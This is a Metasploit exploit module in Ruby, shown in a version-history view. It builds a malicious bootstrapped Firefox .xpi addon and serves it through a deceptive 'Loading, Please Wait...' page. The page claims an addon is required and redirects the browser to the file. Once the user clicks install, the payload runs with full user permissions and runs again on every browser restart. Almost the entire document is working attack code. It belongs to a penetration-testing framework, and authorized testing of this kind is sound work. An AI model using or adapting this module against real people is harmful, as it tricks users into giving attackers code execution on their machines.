metasploit-framework/modules/exploits/multi/browser/firefox_xpi_bootstrapped_ad...

77 lines
2.7 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'rex/zip'
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
2013-12-19 02:35:43 +00:00
include Msf::Exploit::Remote::FirefoxAddonGenerator
2013-08-30 21:28:54 +00:00
def initialize( info = {} )
super( update_info( info,
'Name' => 'Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution',
'Description' => %q{
This exploit dynamically creates a .xpi addon file.
The resulting bootstrapped Firefox addon is presented to
the victim via a web page. The victim's Firefox browser
2013-08-30 21:28:54 +00:00
will pop a dialog asking if they trust the addon.
Once the user clicks "install", the addon is installed and
executes the payload with full user permissions. As of Firefox
4, this will work without a restart as the addon is marked to
be "bootstrapped". As the addon will execute the payload after
each Firefox restart, an option can be given to automatically
uninstall the addon once the payload has been executed.
},
'License' => MSF_LICENSE,
'Author' => [ 'mihi', 'joev' ],
2013-08-30 21:28:54 +00:00
'References' =>
[
[ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ],
[ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]
2013-08-30 21:28:54 +00:00
],
'DisclosureDate' => 'Jun 27 2007'
2013-08-30 21:28:54 +00:00
))
end
def on_request_uri(cli, request)
if request.uri.match(/\.xpi$/i)
# browser has navigated to the .xpi file
print_status("Sending xpi and waiting for user to click 'accept'...")
if not xpi = generate_addon_xpi(cli)
print_error("Failed to generate the payload.")
send_not_found(cli)
else
send_response(cli, xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
end
else
# initial browser request
# force the user to access a directory-like URL
2013-08-30 21:28:54 +00:00
if not request.uri.match(/\/$/)
print_status("Redirecting request." )
send_redirect(cli, "#{get_resource}/")
else
# user has navigated
print_status("Sending response HTML." )
send_response_html(cli, generate_html)
2013-08-30 21:28:54 +00:00
end
end
handler(cli)
2013-08-30 21:28:54 +00:00
end
def generate_html
html = %Q|<html><head><title>Loading, Please Wait...</title></head>\n|
html << %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|
html << %Q|<script>window.location.href="addon.xpi";</script>\n|
html << %Q|</body></html>|
return html
2013-08-30 21:28:54 +00:00
end
end